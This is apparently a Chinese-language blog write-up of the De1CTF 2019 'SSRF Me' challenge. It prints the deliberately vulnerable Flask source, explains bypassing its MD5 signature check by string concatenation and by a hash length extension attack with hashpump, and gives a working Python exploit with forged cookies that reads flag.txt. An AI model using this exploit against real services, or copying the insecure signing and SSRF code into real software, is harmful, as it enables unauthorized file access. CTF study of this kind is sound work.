• [De1CTF 2019]SSRF Me


    看了好久的wp才做出来的一道题目,感觉自己太菜了。

    给出源码(加了几条注释)

    #! /usr/bin/env python
    #encoding=utf-8
    from flask import Flask
    from flask import request
    import socket
    import hashlib
    import urllib
    import sys
    import os
    import json
    reload(sys)
    sys.setdefaultencoding('latin1')
    
    app = Flask(__name__)
    
    secert_key = os.urandom(16)
    
    
    class Task:
        def __init__(self, action, param, sign, ip):       #构造方法self代表对象,其他是对象的属性
            self.action = action
            self.param = param
            self.sign = sign
            self.sandbox = md5(ip)
            if(not os.path.exists(self.sandbox)):          #SandBox For Remote_Addr
                os.mkdir(self.sandbox)
    
        def Exec(self):
            result = {}
            result['code'] = 500
            if (self.checkSign()):
                if "scan" in self.action:
                    tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                    resp = scan(self.param)
                    if (resp == "Connection Timeout"):
                        result['data'] = resp
                    else:
                        print resp
                        tmpfile.write(resp)
                        tmpfile.close()
                    result['code'] = 200
                if "read" in self.action:
                    f = open("./%s/result.txt" % self.sandbox, 'r')
                    result['code'] = 200
                    result['data'] = f.read()
                if result['code'] == 500:
                    result['data'] = "Action Error"
            else:
                result['code'] = 500
                result['msg'] = "Sign Error"
            return result
    
        def checkSign(self):
            if (getSign(self.action, self.param) == self.sign):
                return True
            else:
                return False
    
    
    #generate Sign For Action Scan.
    @app.route("/geneSign", methods=['GET', 'POST'])
    def geneSign():
        param = urllib.unquote(request.args.get("param", ""))
        action = "scan"
        return getSign(action, param)
    
    
    @app.route('/De1ta',methods=['GET','POST'])
    def challenge():
        action = urllib.unquote(request.cookies.get("action"))   #提取cookie信息中的,名为action得对应值
        param = urllib.unquote(request.args.get("param", ""))    #提取get方法传入的,参数名叫param对应得值
        sign = urllib.unquote(request.cookies.get("sign"))       #70-72 将url编码解码
        ip = request.remote_addr
        if(waf(param)):
            return "No Hacker!!!!"
        task = Task(action, param, sign, ip)
        return json.dumps(task.Exec())                           #Python 对象编码成 JSON 字符串
    @app.route('/')
    def index():
        return open("code.txt","r").read()
    
    
    def scan(param):
        socket.setdefaulttimeout(1)
        try:
            return urllib.urlopen(param).read()[:50]            #读取网络文件参数可以是url
        except:
            return "Connection Timeout"
    
    
    
    def getSign(action, param):
        return hashlib.md5(secert_key + param + action).hexdigest()  #hashlib.md5()#获取一个md5加密算法对象,hexdigest()是获得加密吼的16进制字符串
    
    
    def md5(content):
        return hashlib.md5(content).hexdigest()
    
    
    def waf(param):
        check=param.strip().lower()
        if check.startswith("gopher") or check.startswith("file"):
            return True
        else:
            return False
    
    
    if __name__ == '__main__':
        app.debug = False
        app.run(host='0.0.0.0')

    字符串拼接

    访问 /geneSign?param=flag.txt 得到

     看到 getSign 处的凭拼接

    def getSign(action, param):
        return hashlib.md5(secert_key + param + action).hexdigest()  #hashlib.md5()#获取一个md5加密算法对象,hexdigest()是获得加密吼的16进制字符串

    如果 secert_key x,则访问 /geneSign?param=flag.txt 时,返回的md5为 md5('xxx' + 'flag.txt' + 'scan') ,相当于 md5(xxxflag.txtscan)

    于是构造 /geneSign?param=flag.txtread 得到 等价于 md5('readflag.txtreadscan')的md5

     bp 抓包后 构造 Cookie 得到

    哈希拓展攻击

    hashpump安装地址:https://github.com/bwall/HashPump

    使用hashpump得到

     构造exp

    import requests
    
    url = 'http://81594ff5-0ef9-430d-b05d-a2ed55821ebe.node3.buuoj.cn/De1ta?param=flag.txt'
    cookies = {
        'sign':'cf9ddaa36a50820322980590a6eff5ca',
        'action':'scan%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00read'
    }
    
    res = requests.get(url=url,cookies=cookies)
    print(res.text)

    得到

     参考了:https://xz.aliyun.com/t/5927;https://joychou.org/web/hash-length-extension-attack.html

    大佬们的文章。

  • 相关阅读:
    day1 生活大爆炸版石头剪刀布
    友谊赛
    再数17
    素数统计
    day1 LGTB玩THD
    day1 LGTB学分块
    day1 LGTB玩扫雷
    组合(1-m中选n个数)
    二分查找法,加递归,之前做了一个没加递归,结果就废了
    以前的一个程序,死循环,骚年,卡爆你的电脑吧
  • 原文地址:https://www.cnblogs.com/yanwusheng/p/13385452.html
Copyright © 2020-2023  润新知